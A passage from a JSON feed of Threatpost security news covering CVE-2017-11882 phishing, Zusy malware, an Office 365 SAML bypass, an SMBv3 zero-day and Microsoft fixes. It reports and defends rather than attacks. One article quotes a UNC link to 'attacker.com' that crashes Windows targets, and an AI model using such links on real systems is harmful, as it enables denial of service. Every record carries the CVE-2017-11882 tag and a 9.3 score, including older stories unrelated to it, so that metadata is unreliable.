may have been the same one to compromise DigiNotar\u2013[penetrated Comodo](<https://threatpost.com/phony-ssl-certificates-issued-google-yahoo-skype-others-032311>), another CA, and pulled the same stunt, issuing certificates for Mozilla, Skype and Yahoo domains. The public-key pinning mechanism has the potential to defeat the attacks that result from these kind of CA compromises by locking in a known-good set of keys for a given domain.\n", "cvss3": {}, "published": "2014-11-14T07:42:48", "type": "threatpost", "title": "Microsoft Considering Public-Key Pinning for Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T12:09:37", "id": "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "href": "https://threatpost.com/microsoft-considering-public-key-pinning-for-internet-explorer/109365/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "[](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>)Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:45:33", "description": "Microsoft is warning of a fresh email campaign that distributes malicious RTF files boobytrapped with an exploit dating back to a 2017 vulnerability, [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>).\n\nThe exploit allows attackers to automatically run malicious code without requiring user interaction.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks,\u201d Microsoft Security Intelligence tweeted on Friday. \u201cNotably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.\u201d\n\n> An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction. [pic.twitter.com/Ac6dYG9vvw](<https://t.co/Ac6dYG9vvw>)\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [June 7, 2019](<https://twitter.com/MsftSecIntel/status/1137118977983897600?ref_src=twsrc%5Etfw>)\n\nThe flaw is a stack-based overflow bug in Microsoft Equation Editor.\n\n\u201cThe security flaw affected all versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000,\u201d Tripwire explained in [a write-up](<https://www.tripwire.com/state-of-security/latest-security-news/microsoft-warns-of-malspam-campaign-abusing-office-vulnerability-to-distribute-backdoor/>), posted Monday. \u201cThe security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In [an] analysis, for instance, researchers found a digital attacker could easily launch a file from the WebDAV server under their control as well as use an OLE auto-update to exploit the flaw without any user interaction.\u201d\n\nIn this current wave of attacks targets receive an email in one of several European languages. If the recipient falls for the lure and clicks on the RTF file, it downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) which in turn download a backdoor payload. The backdoor payload then tries to connect to command-and-control server (which was down at the time of Microsoft Security Intelligence\u2019s warning).\n\nThe same bug was at the heart of a campaign in late 2018 and early 2019 that distributed the most recent version of the .Hawkeye keylogger. Emails arrived with malicious Microsoft Excel, RTF and Doc attachments loaded with an exploit for the arbitrary code-execution bug.\n\nOnce a victim clicked on the attachment, the email-senders have intentionally made the contents of the documents look blurry \u2014 and the user was prompted to enable editing to have a clearer view of the contents. After they did that, the injection process began, with the HawkEye keylogger being downloaded. The malware then snatched up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nCybercriminals using older bugs is a clear indicator that better patching habits in order: \u201cThe fact that digital attacks continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights [the need for organizations to keep their software up-to-date](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>) by investing in their vulnerability management capabilities,\u201d noted Tripwire.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-10T16:10:04", "type": "threatpost", "title": "Microsoft Warns of Email Attacks Executing Code Using an Old Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-06-10T16:10:04", "id": "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "href": "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Researchers are warning of several recent spam campaigns delivering PowerPoint files that when opened contain a mouseover link that installs a variant of the Zusy malware.\n\nThe malware is novel because it does not rely on macros, JavaScript or VBA macros to be enabled for the dropper file to download the malware payload. Instances of the malware are relatively low, according to researchers who attribute the small infection numbers to the fact that recent versions of Microsoft Office warn users that booby-trapped files could be malicious.\n\nVictims must first open the PowerPoint file to become infected; once opened a \u201cLoading\u2026 Please wait\u201d hypertext message appears. If a user hovers over those words it triggers an infection chain that delivers the Zusy malware payload.\n\n\u201cWhen the user mouses over the text (which is the most common way users would check a hyperlink) it results in PowerPoint executing PowerShell,\u201d wrote Ruben Dodge, a cyber intelligence analyst in a [blog post last week](<https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/>).\n\nKevin Epstein, VP of Threat Operations at Proofpoint said the approach is new when it comes to user-triggered malware downloads. \u201cThis technique was just introduced, so there will likely be a few users caught unaware,\u201d he said.\n\nAccording to several security firms tracking the malware, Zusy is currently being spread via spam campaigns with subject lines like \u201cPurchase Order #130527\u201d and \u201cConfirmation.\u201d The name of the PowerPoint file varies from \u201corder.ppsx\u201d, \u201cinvoice.ppsx\u201d or \u201corder&amp;prsn.ppsx.\u201d\n\nThe technical aspect of the mouseover technique includes an \u201celement definition for a hover action\u201d in the hypertext phrase \u201cLoading\u2026 Please wait\u201d embedded in the first slide of the PowerPoint file, according to Dodge. By hovering over the hyperlink a PowerShell module is instructed visit a URL and fetch a malware downloader that\u2019s saved to the target\u2019s Temp folder, according to the researcher.\n\nThe final stage includes the execution of the JScript Encoded Script file (ii.jse) that pulls down the Zusy payload.\n\nIf Office 2013 and Office 2010 have the Protected View security feature enabled they will receive a warning: \u201cMicrosoft Office has identified a potential security concern.\u201d Users are then prompted to either \u201cEnable All,\u201d \u201cEnable\u201d and \u201cDisable.\u201d\n\n\u201cIt is a technique blocked by default, caught by most antivirus programs, and easily detected as an attachment type,\u201d Epstein said. \u201cIt seems unlikely to prove as rapid to spread as other recent malware distribution approaches.\u201d\n\nVariants of the Zusy malware have been around for years. Early incarnations of Zusy took the form of adware. Later versions of Zusy have been updated with a spyware component used to steal information from businesses, according to researchers.\n", "cvss3": {}, "published": "2017-06-07T14:36:01", "type": "threatpost", "title": "Zusy Malware Installs Via Mouseover \u2013 No Clicking Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-19T12:40:15", "id": "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "href": "https://threatpost.com/zusy-malware-installs-via-mouseover-no-clicking-required/126122/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:39", "description": "Mark Dowd, fresh off his [2017 Security Analyst Summit keynote](<https://threatpost.com/memory-corruption-mitigations-doing-their-job/124728/>), discusses why certain exploit mitigations have been so successful in driving up the cost of exploit development for attackers.\n", "cvss3": {}, "published": "2017-05-26T12:00:08", "type": "threatpost", "title": "Mark Dowd on Exploit Mitigation Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:20:30", "id": "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "href": "https://threatpost.com/mark-dowd-on-exploit-mitigation-development/125947/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "description": "A severe vulnerability in the way Microsoft Office 365 handles federated identities via SAML put an attacker in position to have access to any account and data, including email messages and files stored in the cloud-based service.\n\nMicrosoft pushed through a mitigation to the service on Jan. 5, seven hours after being notified by researchers Yiannis Kakavas and Klemen Bratec.\n\n\u201cThe attack surface was quite big (Outlook Online, OneDrive, Skype for Business, OneNote \u2013 depending on what the company has paid for in terms of licensing ),\u201d Kakavas and Bratec told Threatpost via email. \u201cAnd a malicious user exploiting this vulnerability could have gained access to very sensitive private and company information. (emails, internal documents etc. ).\u201d\n\nOffice 365 users in the line of fire that had configured domains as federated were extensive, worldwide and high profile, ranging from British Airways, Microsoft, Vodafone, Verizon and many others listed in a [report](<http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass>) [published](<https://bratec.si/security/2016/04/27/road-to-hell-paved-with-saml-assertions.html>) this week.\n\nKakavas, of the Greek Research and Technology Network, and Bratec of the Sola prihodnosti Maribor, identified the vulnerability in the SAML Service Provider implementation in Office 365. The flaw allowed for a \u201ccross-domain authentication bypass affecting all federated domains,\u201d the researchers wrote. SAML is the Security Assertion Markup Language, a standard used by organizations to exchange authentication and authorization data. SAML is used primarily as a means of enabling single sign-on between web domains.\n\nThe problem with Microsoft\u2019s implementation of SAML 2.0 in Office 365 is that the service fails to authenticate that the subject of the assertion being passed\u2014specifically the NameID element. The exchange must then rely on other values such as an IDPEmail attribute to validate the exchange.\n\n\u201cAs it turns out, the Service Provider used the Issuer of the Assertion only to find the mathing certificate in order to verify the SAML Response/Assertion signature, but didn\u2019t perform any sanity checks on the supplied value of the IDPEmail attribute,\u201d the researchers wrote. \u201cThat basically means that it would happily consume assertions, asserting that Identity Provider X has authenticated users of Identity Provider Y.\u201d\n\nThe researchers describe the technical details in their report. They told Threatpost that the flaw was relatively easy to exploit, but added there is not indication the flaw had ever been publicly exploited, nor how long it was present in Office 365 before it was found.\n\n\u201cAll an attacker needed was a trial subscription to Office 365 and a SAML 2.0 Identity Provider installation. There is some bare minimum of SAML knowledge once must have, but the process of setting up SAML SSO with Office 365 is well documented and easy to follow,\u201d the researchers said. \u201cA more advanced attacker with slightly better SAML knowledge would be able to script a tool and perform the attack in an automated manner without the need of a SAML 2.0 Identity Provider.\u201d\n\nThe researchers said the flaw is not limited to SAML-based single sign-on implementations; they were able to carry out the same attack over Active Directory Federation Services.\n\n\u201cThe SAML Service Provider consumed the SAML assertion from the attacker\u2019s org Identity Provider even though the spmb.si domain is configured to be federated with WS-Trust, forwarded it to the token translation service which translated it to an WS-Trust token and \u2026 we were in,\u201d they wrote.\n\nThey told Threatpost: \u201cWe were surprised that the organizations that have their domains federated using WS-Trust and ADFS were also vulnerable to this. We know that pretty much only academic institutions use SAML 2.0 SSO, so in the beginning the number of vulnerable organizations seemed to be relatively small.\u201d\n\nThe two said they were awarded close to the maximum bounty from Microsoft for their research; the bounty pays between $500 and $15,000 USD.\n", "cvss3": {}, "published": "2016-04-28T10:44:58", "type": "threatpost", "title": "Office 365 Vulnerability Exposed Any Federated Account", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-29T16:54:19", "id": "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "href": "https://threatpost.com/office-365-vulnerability-exposed-any-federated-account/117716/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&amp;if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. \u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufacturers smart meters for installation around the world. Those meters are used to regulate and measure power usage in homes and businesses and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program, based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. Steve Lipner, one of the driving forces behind the Trustworthy Computing initative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. \u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. \u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround for the vulnerability that Microsoft shipped late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team, explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, \nwe believe it is no longer safe to browse to a malicious, untrusted \nWebDAV server in the Internet Zone and double-click on **_any_** \ntype of files. Attackers are clever, substituting dangerous file icons \nwith safe, trusted file icons. They have even recently begun obfuscating \nthe filename based on character encoding tricks (such as right-to-left \ncharacter encoding). Their goal is to entice unsuspecting users into \ndouble-clicking on a malicious executable. With or without this new \nremote vector to the DLL Preloading issue, it\u2019s very hard to make a \ntrust decision given the amount of control an attacker has over the \nmalicious WebDAV server browsing experience. We recommend users only \ndouble-click on file icons from WebDAV shares known to be trusted, safe, \nand not under the control of a malicious attacker,\u201d Ness said.\n\nThe company has released a workaround for the DLL bug, which involved editing the registry to create a new entry. The solution also includes a downloadable tool. But the tool was turned off by default, fo Microsoft has now published a new FixIt tool that will automatically enable it.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager\n * Right-click Session Manager, point to New, and then click Dword Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. \n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computers is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:21", "description": "The U.S. Navy recently hired an outside contractor, Obscure Technologies, to develop computer forensics tools capable of analyzing network traffic and stored data on gaming consoles.\n\nThe contract, valued at $177,237.50, calls on Obscure Technologies to create hardware and software tools that can be used to extract data from video game systems, compile a collection of data (disk images; flash memory dumps; configuration settings) extracted from new and used video game systems, and prepare a 10-20 page report including the following:\n\nDetailed accounts of issues involved in extracting forensic data from a series of game consoles, technical information regarding how information can be extracted from video game systems, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.\n\n\u201cThis project involves furnishing video game systems, both new and used, and creating prototype rigs for capturing data from the video game systems,\u201d reads the Navy\u2019s official listing.\n\nThe project seeks to create these tools for use by the United States Department of Homeland Security Science and Technology.\n\nObscure Technologies was awarded this contract, the Navy claims, because they appear to be the only U.S. company in the business of purchasing used computer equipment for the purpose of accessing the data stored within. The Navy\u2019s justification and approval report also notes that Obscure Technologies lead scientist has experience reverse engineering the Microsoft XBOX.\n\nYou can find the Navy\u2019s justification and approval document [here](<https://www.fbo.gov/index?s=opportunity&mode=form&id=fa7296a2e0980fe24aa72c919a665b44>).\n", "cvss3": {}, "published": "2012-04-09T18:33:01", "type": "threatpost", "title": "Navy Hires Contractor to Data-Mine Gaming Consoles", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:05:32", "id": "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "href": "https://threatpost.com/navy-hires-contractor-data-mine-gaming-consoles-040912/76420/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released a**[](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>)**n announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of 